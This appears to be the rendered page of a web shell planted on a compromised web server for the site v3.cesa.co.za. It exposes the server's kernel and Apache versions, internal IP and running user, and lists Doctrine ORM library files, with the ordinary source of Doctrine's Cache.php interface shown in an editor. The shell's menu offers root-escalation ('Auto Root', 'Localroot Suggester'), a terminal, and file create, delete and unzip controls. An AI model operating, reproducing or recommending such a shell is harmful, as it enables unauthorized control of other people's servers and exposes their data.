Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
doctrine /
orm /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Cache
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Decorator
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Event
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Id
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Internal
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Mapping
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Persisters
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Proxy
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Query
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Repository
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Tools
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Utility
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
AbstractQuery.php
40.83
KB
-rwxrwxr-x
2026-04-02 06:18
Cache.php
4.71
KB
-rwxrwxr-x
2026-04-02 06:18
Configuration.php
35.73
KB
-rwxrwxr-x
2026-04-02 06:18
EntityManager.php
31.96
KB
-rwxrwxr-x
2026-04-02 06:18
EntityManagerInterface.php
9.59
KB
-rwxrwxr-x
2026-04-02 06:18
EntityNotFoundException.php
1.06
KB
-rwxrwxr-x
2026-04-02 06:18
EntityRepository.php
10.99
KB
-rwxrwxr-x
2026-04-02 06:18
Events.php
3.93
KB
-rwxrwxr-x
2026-04-02 06:18
LazyCriteriaCollection.php
2.88
KB
-rwxrwxr-x
2026-04-02 06:18
NativeQuery.php
1.76
KB
-rwxrwxr-x
2026-04-02 06:18
NoResultException.php
356
B
-rwxrwxr-x
2026-04-02 06:18
NonUniqueResultException.php
468
B
-rwxrwxr-x
2026-04-02 06:18
ORMException.php
8.82
KB
-rwxrwxr-x
2026-04-02 06:18
ORMInvalidArgumentException.php
10.34
KB
-rwxrwxr-x
2026-04-02 06:18
ORMSetup.php
6.88
KB
-rwxrwxr-x
2026-04-02 06:18
OptimisticLockException.php
2.03
KB
-rwxrwxr-x
2026-04-02 06:18
PersistentCollection.php
21.18
KB
-rwxrwxr-x
2026-04-02 06:18
PessimisticLockException.php
309
B
-rwxrwxr-x
2026-04-02 06:18
Query.php
24.43
KB
-rwxrwxr-x
2026-04-02 06:18
QueryBuilder.php
44.52
KB
-rwxrwxr-x
2026-04-02 06:18
TransactionRequiredException.php
496
B
-rwxrwxr-x
2026-04-02 06:18
UnexpectedResultException.php
209
B
-rwxrwxr-x
2026-04-02 06:18
UnitOfWork.php
145.19
KB
-rwxrwxr-x
2026-04-02 06:18
Version.php
962
B
-rwxrwxr-x
2026-04-02 06:18
Save
Rename
<?php declare(strict_types=1); namespace Doctrine\ORM; use Doctrine\ORM\Cache\QueryCache; use Doctrine\ORM\Cache\Region; /** * Provides an API for querying/managing the second level cache regions. */ interface Cache { public const DEFAULT_QUERY_REGION_NAME = 'query_cache_region'; public const DEFAULT_TIMESTAMP_REGION_NAME = 'timestamp_cache_region'; /** * May read items from the cache, but will not add items. */ public const MODE_GET = 1; /** * Will never read items from the cache, * but will add items to the cache as it reads them from the database. */ public const MODE_PUT = 2; /** * May read items from the cache, and add items to the cache. */ public const MODE_NORMAL = 3; /** * The query will never read items from the cache, * but will refresh items to the cache as it reads them from the database. */ public const MODE_REFRESH = 4; /** * @param string $className The entity class. * * @return Region|null */ public function getEntityCacheRegion($className); /** * @param string $className The entity class. * @param string $association The field name that represents the association. * * @return Region|null */ public function getCollectionCacheRegion($className, $association); /** * Determine whether the cache contains data for the given entity "instance". * * @param string $className The entity class. * @param mixed $identifier The entity identifier * * @return bool true if the underlying cache contains corresponding data; false otherwise. */ public function containsEntity($className, $identifier); /** * Evicts the entity data for a particular entity "instance". * * @param string $className The entity class. * @param mixed $identifier The entity identifier. * * @return void */ public function evictEntity($className, $identifier); /** * Evicts all entity data from the given region. * * @param string $className The entity metadata. * * @return void */ public function evictEntityRegion($className); /** * Evict data from all entity regions. * * @return void */ public function evictEntityRegions(); /** * Determine whether the cache contains data for the given collection. * * @param string $className The entity class. * @param string $association The field name that represents the association. * @param mixed $ownerIdentifier The identifier of the owning entity. * * @return bool true if the underlying cache contains corresponding data; false otherwise. */ public function containsCollection($className, $association, $ownerIdentifier); /** * Evicts the cache data for the given identified collection instance. * * @param string $className The entity class. * @param string $association The field name that represents the association. * @param mixed $ownerIdentifier The identifier of the owning entity. * * @return void */ public function evictCollection($className, $association, $ownerIdentifier); /** * Evicts all entity data from the given region. * * @param string $className The entity class. * @param string $association The field name that represents the association. * * @return void */ public function evictCollectionRegion($className, $association); /** * Evict data from all collection regions. * * @return void */ public function evictCollectionRegions(); /** * Determine whether the cache contains data for the given query. * * @param string $regionName The cache name given to the query. * * @return bool true if the underlying cache contains corresponding data; false otherwise. */ public function containsQuery($regionName); /** * Evicts all cached query results under the given name, or default query cache if the region name is NULL. * * @param string|null $regionName The cache name associated to the queries being cached. * * @return void */ public function evictQueryRegion($regionName = null); /** * Evict data from all query regions. * * @return void */ public function evictQueryRegions(); /** * Get query cache by region name or create a new one if none exist. * * @param string|null $regionName Query cache region name, or default query cache if the region name is NULL. * * @return QueryCache The Query Cache associated with the region name. */ public function getQueryCache($regionName = null); }